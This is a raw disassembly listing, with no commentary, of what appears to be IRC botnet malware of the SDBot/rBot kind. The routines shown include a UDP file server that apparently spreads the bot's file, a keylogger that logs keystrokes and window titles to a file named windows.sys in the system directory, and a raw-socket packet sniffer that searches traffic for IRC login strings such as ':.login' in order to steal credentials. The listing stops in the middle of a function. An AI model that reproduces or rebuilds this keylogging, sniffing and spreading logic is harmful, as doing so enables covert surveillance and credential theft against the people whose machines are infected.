lea eax, [ebp+74h+Source]
push eax
call sub_417D70
pop ecx
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_24]
push eax
push edi
call dword_4440BC ; accept
push [ebp+74h+var_3C]
mov ebx, eax
movzx eax, [ebp+74h+var_22]
push eax
push [ebp+74h+var_20]
mov [ebp+74h+var_28], esi
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Source]
push offset asc_435150 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+74h+Source]
push 19h ; int
push eax ; Source
call sub_40AE85
mov ecx, [ebp+74h+var_3C]
mov [ebp+74h+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_4444EC[eax], ecx
lea eax, [ebp+74h+arg_0]
push eax
push esi
lea eax, [ebp+74h+var_D4]
push eax
push offset sub_4142A9
push esi
push esi
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+74h+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_4444FC[ecx], eax
jnz short loc_41463C
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+Source]
push offset asc_435110 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_414583
; ---------------------------------------------------------------------------
loc_414634: ; CODE XREF: sub_4144B2+18D�j
push 5
call ds:dword_42B014 ; Sleep
loc_41463C: ; CODE XREF: sub_4144B2+160�j
cmp [ebp+74h+var_28], esi
jz short loc_414634
jmp loc_414583
; ---------------------------------------------------------------------------
loc_414646: ; CODE XREF: sub_4144B2+7A�j
; sub_4144B2+8B�j
push edi
call dword_444218 ; closesocket
push [ebp+74h+var_40]
lea eax, [ebp+74h+Source]
push offset asc_4350DC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_30], esi
jnz short loc_414683
push esi ; int
push [ebp+74h+var_34] ; int
lea eax, [ebp+74h+Source]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_D4] ; int
call sub_40123B
add esp, 14h
loc_414683: ; CODE XREF: sub_4144B2+1B5�j
lea eax, [ebp+74h+Source]
push eax
call sub_417D70
push [ebp+74h+var_3C]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_4144B2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4146A1 proc near ; CODE XREF: sub_4146A1:loc_414B0D�p
; DATA XREF: sub_40274D+1F07�o ...
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
Dest = byte ptr -778h
var_578 = byte ptr -578h
var_577 = byte ptr -577h
var_576 = byte ptr -576h
var_575 = byte ptr -575h
DstBuf = byte ptr -574h
var_374 = dword ptr -374h
var_370 = byte ptr -370h
Str = byte ptr -26Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = byte ptr -15Ch
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D0 = byte ptr -0D0h
var_CF = byte ptr -0CFh
var_CE = byte ptr -0CEh
var_CD = byte ptr -0CDh
var_50 = byte ptr -50h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
Dst = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 87Ch
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push ebx
xor eax, eax
inc eax
mov esi, edx
push 2
mov ecx, 0A9h
lea edi, [ebp+74h+var_374]
rep movsd
inc [ebp+74h+var_164]
push 2
mov [ebp+74h+var_10], eax
mov [ebp+74h+var_14], eax
mov [ebp+74h+var_8], eax
mov [edx+2A0h], eax
call dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_414755
push 190h
call ds:dword_42B014 ; Sleep
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+74h+Dest]
push offset asc_435210 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_D8], ebx
jnz short loc_414738
push ebx ; int
push [ebp+74h+var_DC] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_15C]
push eax ; Str
push [ebp+74h+var_374] ; int
call sub_40123B
add esp, 14h
loc_414738: ; CODE XREF: sub_4146A1+75�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_168]
call sub_40B149
pop ecx
jmp loc_414AF9
; ---------------------------------------------------------------------------
loc_414755: ; CODE XREF: sub_4146A1+4A�j
push 4
lea eax, [ebp+74h+var_10]
push eax
push 4
mov edi, 0FFFFh
push edi
push esi
call dword_444120 ; setsockopt
push 4
lea eax, [ebp+74h+var_14]
push eax
push 0FFFFFFFBh
push edi
push esi
call dword_444120 ; setsockopt
mov eax, [ebp+74h+var_168]
imul eax, 234h
push 10h ; Size
mov dword_4444F4[eax], esi
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+74h+var_160]
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
mov [ebp+74h+var_2A], ax
push 10h
lea eax, [ebp+74h+Dst]
push eax
push esi
mov [ebp+74h+var_28], ebx
call dword_4441E4 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4147DF
push 1388h
call ds:dword_42B014 ; Sleep
dec [ebp+74h+var_164]
push [ebp+74h+arg_0]
jmp loc_414B0D
; ---------------------------------------------------------------------------
loc_4147DF: ; CODE XREF: sub_4146A1+123�j
lea eax, [ebp+74h+var_370]
push offset aRb ; "rb"
push eax ; char *
call _fopen
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+74h+File], eax
jnz short loc_414858
push 190h
call ds:dword_42B014 ; Sleep
lea eax, [ebp+74h+var_370]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_4351E8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+74h+var_DC] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_15C]
push eax ; Str
push [ebp+74h+var_374] ; int
call sub_40123B
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_168]
call sub_40B149
add esp, 28h
jmp loc_414AFA
; ---------------------------------------------------------------------------
loc_414858: ; CODE XREF: sub_4146A1+156�j
; sub_4146A1+426�j
mov edi, [ebp+74h+arg_0]
cmp [edi+2A0h], ebx
jz loc_414AD0
mov edi, 80h
push edi ; Size
lea eax, [ebp+74h+var_D0]
push ebx ; Val
push eax ; Dst
mov [ebp+74h+var_1C], 5
mov [ebp+74h+var_18], 1388h
mov [ebp+74h+var_878], esi
mov [ebp+74h+var_87C], 1
call _memset
add esp, 0Ch
lea eax, [ebp+74h+var_1C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_87C]
push eax
push ebx
call dword_4441B0 ; select
test eax, eax
jle loc_414AC4
xor eax, eax
mov ecx, edi
mov [ebp+74h+var_578], bl
lea edi, [ebp+74h+var_577]
rep stosd
stosw
stosb
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_3C]
push eax
push ebx
push 80h
lea eax, [ebp+74h+var_D0]
push eax
push esi
mov [ebp+74h+var_C], 10h
call dword_444088 ; recvfrom
push [ebp+74h+var_38]
mov [ebp+74h+var_8], eax
call dword_444188 ; inet_ntoa
push eax ; Format
lea eax, [ebp+74h+var_50]
push eax ; Dest
call _sprintf
cmp [ebp+74h+var_D0], bl
pop ecx
pop ecx
jnz loc_414AAE
cmp [ebp+74h+var_CF], 1
jnz loc_4149C9
lea eax, [ebp+74h+Str]
push eax ; Str
call _strlen
push ebx ; Origin
push ebx ; Offset
push [ebp+74h+File] ; File
call _fseek
push [ebp+74h+File] ; File
lea eax, [ebp+74h+DstBuf]
push 200h ; Count
push 1 ; ElementSize
push eax ; DstBuf
mov [ebp+74h+var_578], bl
mov [ebp+74h+var_577], 3
mov [ebp+74h+var_576], bl
mov [ebp+74h+var_575], 1
call _fread
add esp, 20h
push [ebp+74h+var_C]
lea ecx, [ebp+74h+var_3C]
push ecx
mov [ebp+74h+var_8], eax
push ebx
add eax, 4
push eax
lea eax, [ebp+74h+var_578]
push eax
push esi
call dword_4440CC ; sendto
lea eax, [ebp+74h+var_50]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_4351C0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_D8], ebx
jnz short loc_4149B7
push ebx ; int
push [ebp+74h+var_DC] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_15C]
push eax ; Str
push [ebp+74h+var_374] ; int
call sub_40123B
add esp, 14h
loc_4149B7: ; CODE XREF: sub_4146A1+2F4�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
pop ecx
jmp loc_414AC4
; ---------------------------------------------------------------------------
loc_4149C9: ; CODE XREF: sub_4146A1+26D�j
cmp [ebp+74h+var_CF], 4
jnz loc_414AAE
mov cl, [ebp+74h+var_CD]
cmp cl, 0FFh
mov al, [ebp+74h+var_CE]
mov [ebp+74h+var_578], bl
mov [ebp+74h+var_577], 3
jnz short loc_4149F7
inc al
xor cl, cl
mov [ebp+74h+var_575], bl
jmp short loc_4149FF
; ---------------------------------------------------------------------------
loc_4149F7: ; CODE XREF: sub_4146A1+348�j
inc cl
mov [ebp+74h+var_575], cl
loc_4149FF: ; CODE XREF: sub_4146A1+354�j
mov [ebp+74h+var_576], al
movzx eax, al
shl eax, 8
movzx ecx, cl
add eax, ecx
shl eax, 9
mov edi, 200h
push ebx ; Origin
sub eax, edi
push eax ; Offset
push [ebp+74h+File] ; File
call _fseek
push [ebp+74h+File] ; File
lea eax, [ebp+74h+DstBuf]
push edi ; Count
push 1 ; ElementSize
push eax ; DstBuf
call _fread
add esp, 1Ch
push [ebp+74h+var_C]
mov edi, eax
lea eax, [ebp+74h+var_3C]
push eax
push ebx
lea eax, [edi+4]
push eax
lea eax, [ebp+74h+var_578]
push eax
push esi
mov [ebp+74h+var_8], edi
call dword_4440CC ; sendto
cmp edi, ebx
jnz short loc_414AC4
lea eax, [ebp+74h+var_50]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_4351A0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_D8], ebx
jnz short loc_414A99
push ebx ; int
push [ebp+74h+var_DC] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_15C]
push eax ; Str
push [ebp+74h+var_374] ; int
call sub_40123B
add esp, 14h
loc_414A99: ; CODE XREF: sub_4146A1+3D6�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
inc dword_4D4008
pop ecx
jmp short loc_414AC4
; ---------------------------------------------------------------------------
loc_414AAE: ; CODE XREF: sub_4146A1+263�j
; sub_4146A1+32C�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_3C]
push eax
push ebx
push 9
push offset dword_435194
push esi
call dword_4440CC ; sendto
loc_414AC4: ; CODE XREF: sub_4146A1+20D�j
; sub_4146A1+323�j ...
cmp [ebp+74h+var_8], ebx
jg loc_414858
mov edi, [ebp+74h+arg_0]
loc_414AD0: ; CODE XREF: sub_4146A1+1C0�j
push esi
call dword_444218 ; closesocket
push [ebp+74h+File] ; File
call _fclose
dec [ebp+74h+var_164]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_414B01
push [ebp+74h+var_168]
call sub_40B149
loc_414AF9: ; CODE XREF: sub_4146A1+AF�j
pop ecx
loc_414AFA: ; CODE XREF: sub_4146A1+1B2�j
push ebx
call ds:dword_42B068 ; ExitThread
loc_414B01: ; CODE XREF: sub_4146A1+44B�j
push 3E8h
call ds:dword_42B014 ; Sleep
push edi
loc_414B0D: ; CODE XREF: sub_4146A1+139�j
call sub_4146A1
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_4146A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_414B1C(int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_414B1C proc near ; CODE XREF: sub_414BFB+B0�p
; sub_414BFB+243�p
Dest = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
push esi
lea eax, [ebp+var_10]
push eax
call ds:dword_42B0D4 ; GetLocalTime
push 104h
lea eax, [ebp+var_114]
push eax
call ds:dword_42B010 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push offset asc_4332BC ; "\\"
push eax ; Dest
call _strcat
lea eax, [ebp+var_114]
push offset aWindows_sys ; "windows.sys"
push eax ; Dest
call _strcat
lea eax, [ebp+var_114]
push offset aAb ; "ab"
push eax ; char *
call _fopen
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_414B81
inc eax
jmp short loc_414BF8
; ---------------------------------------------------------------------------
loc_414B81: ; CODE XREF: sub_414B1C+60�j
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi ; FILE *
call _fprintf
push esi ; File
call _fclose
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_414BF6
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset asc_435248 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push 0 ; int
push [ebp+arg_8C] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+arg_4] ; int
call sub_40123B
add esp, 24h
loc_414BF6: ; CODE XREF: sub_414B1C+A1�j
xor eax, eax
loc_414BF8: ; CODE XREF: sub_414B1C+63�j
pop esi
leave
retn
sub_414B1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_414BFB proc near ; DATA XREF: sub_40274D+4202�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
Dest = byte ptr -4DCh
Dst = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 8DCh
mov eax, [ebp+74h+arg_0]
and [ebp+74h+var_8DC], 0
and [ebp+74h+var_4], 0
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+74h+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
xor eax, eax
mov ecx, 0FFh
lea edi, [ebp+74h+var_8D8]
rep stosd
call dword_4440C0 ; GetForegroundWindow
push 3Ch
lea ecx, [ebp+74h+var_48]
push ecx
push eax
mov [ebp+74h+var_8], eax
call dword_4440B0 ; GetWindowTextA
mov ebx, 200h
loc_414C55: ; CODE XREF: sub_414BFB+2B7�j
push 8
call ds:dword_42B014 ; Sleep
call dword_4440C0 ; GetForegroundWindow
cmp eax, [ebp+74h+var_8]
jz short loc_414CDA
push 3Ch
lea ecx, [ebp+74h+var_48]
push ecx
push eax
mov [ebp+74h+var_8], eax
call dword_4440B0 ; GetWindowTextA
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Dest]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax ; int
call _sprintf
sub esp, 84h
push 25h
pop ecx
lea eax, [ebp+74h+Dest]
mov edi, esp
lea esi, [ebp+74h+var_DC]
push eax ; int
rep movsd
call sub_414B1C
push ebx ; Size
mov [ebp+74h+var_4], eax
lea eax, [ebp+74h+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0A4h
push ebx ; Size
lea eax, [ebp+74h+Dest]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_414CDA: ; CODE XREF: sub_414BFB+6B�j
mov [ebp+74h+arg_0], offset dword_441AC4
loc_414CE1: ; CODE XREF: sub_414BFB+2AD�j
push 10h
call dword_44422C ; GetKeyState
movsx esi, ax
mov eax, [ebp+74h+arg_0]
mov edi, [eax-4]
push edi
call dword_4440A0 ; GetAsyncKeyState
test ah, ah
jns short loc_414D78
push 14h
call dword_44422C ; GetKeyState
test ax, ax
jz short loc_414D29
cmp esi, 0FFFFFFFFh
jle short loc_414D29
cmp edi, 40h
jle short loc_414D29
cmp edi, 5Bh
jge short loc_414D29
mov [ebp+edi*4+74h+var_8DC], 1
jmp loc_414E9D
; ---------------------------------------------------------------------------
loc_414D29: ; CODE XREF: sub_414BFB+10D�j
; sub_414BFB+112�j ...
push 14h
call dword_44422C ; GetKeyState
test ax, ax
jz short loc_414D54
test esi, esi
jge short loc_414D68
cmp edi, 40h
jle short loc_414D54
cmp edi, 5Bh
jge short loc_414D54
mov [ebp+edi*4+74h+var_8DC], 2
jmp loc_414E9D
; ---------------------------------------------------------------------------
loc_414D54: ; CODE XREF: sub_414BFB+139�j
; sub_414BFB+142�j ...
test esi, esi
jge short loc_414D68
mov [ebp+edi*4+74h+var_8DC], 3
jmp loc_414E9D
; ---------------------------------------------------------------------------
loc_414D68: ; CODE XREF: sub_414BFB+13D�j
; sub_414BFB+15B�j
mov [ebp+edi*4+74h+var_8DC], 4
jmp loc_414E9D
; ---------------------------------------------------------------------------
loc_414D78: ; CODE XREF: sub_414BFB+100�j
lea eax, [ebp+edi*4+74h+var_8DC]
mov esi, [eax]
test esi, esi
jz loc_414E9D
and dword ptr [eax], 0
lea eax, [ebp+74h+Dst]
push eax ; Str
call _strlen
cmp edi, 8
pop ecx
jnz short loc_414DAE
lea ecx, [ebp+74h+Dst]
dec ecx
mov byte ptr [eax+ecx], 0
jmp loc_414E9D
; ---------------------------------------------------------------------------
loc_414DAE: ; CODE XREF: sub_414BFB+1A1�j
cmp eax, 1B9h
jbe short loc_414DDA
call dword_4440C0 ; GetForegroundWindow
push 3Ch
lea ecx, [ebp+74h+var_48]
push ecx
push eax
call dword_4440B0 ; GetWindowTextA
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+Dst]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_414E1B
; ---------------------------------------------------------------------------
loc_414DDA: ; CODE XREF: sub_414BFB+1B8�j
cmp edi, 0Dh
jnz loc_414E6F
lea eax, [ebp+74h+Dst]
push eax ; Str
call _strlen
test eax, eax
pop ecx
jz loc_414E9D
call dword_4440C0 ; GetForegroundWindow
push 3Ch
lea ecx, [ebp+74h+var_48]
push ecx
push eax
call dword_4440B0 ; GetWindowTextA
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+Dst]
push eax ; int
push offset aSReturnS ; "%s (Return) (%s)"
loc_414E1B: ; CODE XREF: sub_414BFB+1DD�j
lea eax, [ebp+74h+Dest]
push eax ; int
call _sprintf
sub esp, 84h
push 25h
pop ecx
lea eax, [ebp+74h+Dest]
mov edi, esp
lea esi, [ebp+74h+var_DC]
push eax ; int
rep movsd
call sub_414B1C
push ebx ; Size
mov [ebp+74h+var_4], eax
lea eax, [ebp+74h+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0A4h
push ebx ; Size
lea eax, [ebp+74h+Dest]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
jmp short loc_414E9D
; ---------------------------------------------------------------------------
loc_414E6F: ; CODE XREF: sub_414BFB+1E2�j
cmp esi, 1
jz short loc_414E88
cmp esi, 3
jz short loc_414E88
cmp esi, 2
jz short loc_414E83
cmp esi, 4
jnz short loc_414E9D
loc_414E83: ; CODE XREF: sub_414BFB+281�j
push [ebp+74h+arg_0]
jmp short loc_414E8F
; ---------------------------------------------------------------------------
loc_414E88: ; CODE XREF: sub_414BFB+277�j
; sub_414BFB+27C�j
mov eax, [ebp+74h+arg_0]
add eax, 7
push eax ; Source
loc_414E8F: ; CODE XREF: sub_414BFB+28B�j
lea eax, [ebp+74h+Dst]
push eax ; Dest
call _strcat
pop ecx
pop ecx
loc_414E9D: ; CODE XREF: sub_414BFB+129�j
; sub_414BFB+154�j ...
add [ebp+74h+arg_0], 14h
cmp [ebp+74h+arg_0], offset dword_4421F4
jl loc_414CE1
cmp [ebp+74h+var_4], 0
jz loc_414C55
push [ebp+74h+var_D8]
call sub_40B149
pop ecx
push 0
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_414BFB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_414ECA proc near ; DATA XREF: sub_40274D+3E38�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
Str = byte ptr -1028Ch
Dest = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov eax, 102B4h
lea ebp, [esp-74h]
call __alloca_probe
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 25h
pop ecx
xor eax, eax
inc eax
mov esi, edx
lea edi, [ebp+74h+var_B4]
rep movsd
push 10h ; Size
mov [ebp+74h+var_8], eax
mov [edx+90h], eax
xor esi, esi
lea eax, [ebp+74h+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push esi
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
push [ebp+74h+var_B4]
mov [ebp+74h+var_1A], ax
call sub_4023C9
pop ecx
push eax
call dword_44417C ; inet_addr
push esi
push 3
push 2
mov [ebp+74h+var_18], eax
call dword_444100 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+74h+var_4], ebx
jnz short loc_414F93
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+74h+Dest]
push offset asc_4353AC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_28], esi
jnz short loc_414F79
push esi ; int
push [ebp+74h+var_2C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_B0]
push eax ; Str
push [ebp+74h+var_B4] ; int
call sub_40123B
add esp, 14h
loc_414F79: ; CODE XREF: sub_414ECA+93�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_30]
call sub_40B149
pop ecx
jmp loc_415195
; ---------------------------------------------------------------------------
loc_414F93: ; CODE XREF: sub_414ECA+73�j
mov eax, [ebp+74h+var_30]
imul eax, 234h
mov dword_4444F4[eax], ebx
push 10h
lea eax, [ebp+74h+Dst]
push eax
push ebx
call dword_4441E4 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_414FDD
call dword_4441C4 ; WSAGetLastError
push eax
push offset asc_435380 ; "-"
loc_414FC0: ; CODE XREF: sub_414ECA+13E�j
lea eax, [ebp+74h+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_28], esi
jnz loc_415179
jmp loc_41515F
; ---------------------------------------------------------------------------
loc_414FDD: ; CODE XREF: sub_414ECA+E8�j
push esi
push esi
lea eax, [ebp+74h+var_20]
push eax
push esi
push esi
push 4
lea eax, [ebp+74h+var_8]
push eax
push 98000001h
push ebx
call dword_4441E0 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_41500A
call dword_4441C4 ; WSAGetLastError
push eax
push offset dword_435350
jmp short loc_414FC0
; ---------------------------------------------------------------------------
loc_41500A: ; CODE XREF: sub_414ECA+130�j
mov edi, 0FFFFh
jmp loc_415110
; ---------------------------------------------------------------------------
loc_415014: ; CODE XREF: sub_414ECA+26A�j
cmp [ebp+74h+var_102AB], 6
jnz loc_415110
cmp [ebp+74h+var_10293], 18h
mov eax, [ebp+74h+var_102A8]
mov [ebp+74h+var_C], eax
jnz loc_415110
lea eax, [ebp+74h+Str]
push offset aPsniff_0 ; "[PSNIFF]"
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz loc_415110
lea eax, [ebp+74h+Str]
push offset asc_435334 ; "-"
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz loc_415110
mov eax, offset a_login ; ":.login"
xor ebx, ebx
mov [ebp+74h+arg_0], eax
loc_415077: ; CODE XREF: sub_414ECA+1C8�j
push eax ; SubStr
lea eax, [ebp+74h+Str]
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_415096
inc ebx
add [ebp+74h+arg_0], 18h
mov eax, [ebp+74h+arg_0]
jnz short loc_415077
jmp short loc_41510D
; ---------------------------------------------------------------------------
loc_415096: ; CODE XREF: sub_414ECA+1BE�j
lea eax, [ebp+74h+Str]
push eax
push [ebp+74h+var_102A0]
call dword_444200 ; htons
movzx eax, ax
push eax
push [ebp+74h+var_C]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebx+ebx*2]
mov eax, dword_442254[eax*8]
push off_442230[eax*4]
lea eax, [ebp+74h+Dest]
push offset asc_435300 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
cmp [ebp+74h+var_28], esi
jnz short loc_415100
push esi ; int
push [ebp+74h+var_2C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_B0]
push eax ; Str
push [ebp+74h+var_B4] ; int
call sub_40123B
add esp, 14h
loc_415100: ; CODE XREF: sub_414ECA+21A�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
pop ecx
loc_41510D: ; CODE XREF: sub_414ECA+1CA�j
mov ebx, [ebp+74h+var_4]
loc_415110: ; CODE XREF: sub_414ECA+145�j
; sub_414ECA+151�j ...
push edi ; Size
lea eax, [ebp+74h+var_102B4]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push esi
push edi
lea eax, [ebp+74h+var_102B4]
push eax
push ebx
call dword_444064 ; recv
cmp eax, 0FFFFFFFFh
jnz loc_415014
call dword_4441C4 ; WSAGetLastError
push eax
push offset asc_4352D4 ; "-"
lea eax, [ebp+74h+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+74h+var_28], esi
jnz short loc_415179
loc_41515F: ; CODE XREF: sub_414ECA+10E�j
push esi ; int
push [ebp+74h+var_2C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_B0]
push eax ; Str
push [ebp+74h+var_B4] ; int
call sub_40123B
add esp, 14h
loc_415179: ; CODE XREF: sub_414ECA+108�j
; sub_414ECA+293�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
pop ecx
push ebx
call dword_444218 ; closesocket
push [ebp+74h+var_30]
call sub_40B149
loc_415195: ; CODE XREF: sub_414ECA+C4�j
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_414ECA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41519E(char *Str)
sub_41519E proc near ; CODE XREF: sub_41549E+271�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aBotSniff ; "Bot sniff"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_4151B8
loc_4151B4: ; CODE XREF: sub_41519E+29�j
; sub_41519E+3A�j ...
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_4151B8: ; CODE XREF: sub_41519E+14�j
push offset a_fast_ ; "#.fast.#"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4151B4
push offset aPsniff_1 ; "[PSNIFF]:"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4151B4
push offset aPsniff_2 ; "PSNIFF//"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4151B4
push offset aJoin_0 ; "JOIN #"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_415200
loc_4151FC: ; CODE XREF: sub_41519E+71�j
; sub_41519E+82�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_415200: ; CODE XREF: sub_41519E+5C�j
push offset a302 ; "302 "
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4151FC
push offset a366 ; "366 "
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4151FC
push offset a_login_0 ; ":.login"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4151FC
push offset aLogin_0 ; ":!login"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4151FC
push offset aLogin_1 ; ":!Login"
push esi ; Str
call _strstr
test eax, eax
pop ecx
